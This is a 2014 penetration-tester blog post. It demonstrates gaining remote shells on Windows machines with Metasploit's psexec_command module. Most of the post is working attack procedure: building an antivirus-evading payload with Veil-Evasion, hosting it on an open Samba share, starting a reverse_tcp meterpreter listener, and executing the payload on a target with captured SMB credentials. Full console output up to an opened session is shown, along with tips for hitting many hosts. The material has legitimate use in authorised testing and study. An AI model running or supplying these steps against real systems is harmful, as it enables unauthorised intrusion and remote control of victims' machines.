Archive for May, 2014
Moar Shellz!
Posted by Spoonman1091 in Uncategorized on May 12, 2014
Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:
- Metasploit psexec
- Metasploit psexec_psh
- Windows psexec executable
- Impacket psexec python script
- pth-winexe
- pth-wmis
- smbexec
- Veil-Catapult
All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec_command” module, created by Royce Davis (@r3dy__), from Accuvant LABS.
First, we need to create an AV-safe executable to deploy to our target. If you haven’t checked it out yet, Veil-Evasion is one the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access.
Add this section to “/etc/samba/smb.conf”:
[payloads$] comment = Payloads path = /root/veil-output/compiled browseable = yes read only = yes guest ok = yes public = yes
In Kali Linux, Samba is not running by default, so we need to start it:
root@kali:~# service samba start [ ok ] Starting Samba daemons: nmbd smbd.
Next, we startup Metasploit and open a listener:
root@kali:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|\`.""'. II 6. .P : .' / | \ `. : II 'T;. .;P' '.' / | \ `.' II 'T; ;P' `. / | \ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt Large pentest? List, sort, group, tag and search your hosts and services in Metasploit Pro -- type 'go_pro' to launch it now. =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ] + -- --=[ 1355 exploits - 830 auxiliary - 237 post ] + -- --=[ 335 payloads - 35 encoders - 8 nops ] msf> use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j -z [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 msf exploit(handler) > [*] Starting the payload handler...
Now, we setup “psexec_command” and configure the module to run the executable payload directly from our SMB share:
msf exploit(handler) > use auxiliary/admin/smb/psexec_command msf auxiliary(psexec_command) > set COMMAND start \\\\192.168.81.196\\payloads$\\TrustedSec39.exe COMMAND => start \\192.168.81.196\payloads$\TrustedSec39.exe msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202 RHOSTS => 192.168.81.202 msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe! SMBPass => OMGDontPwnMe! msf auxiliary(psexec_command) > set SMBUser TrustedSec SMBUser => TrustedSec
Pull the trigger and cross your fingers:
msf auxiliary(psexec_command) > exploit [*] 192.168.81.202:445 - Executing the command... [*] Sending stage (769536 bytes) to 192.168.81.202 [*] 192.168.81.202:445 - Getting the command output... [*] 192.168.81.202:445 - Command finished with no output [*] 192.168.81.202:445 - Executing cleanup... [-] 192.168.81.202:445 - Unable to cleanup \WINDOWS\Temp\FtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0) [-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400
It does leave a randomly named txt file in the “Windows\temp” directory that you need to cleanup manually, but that’s it! You can also point RHOSTS to a text file of multiple remote hosts to target.
MOAR SHELLZ!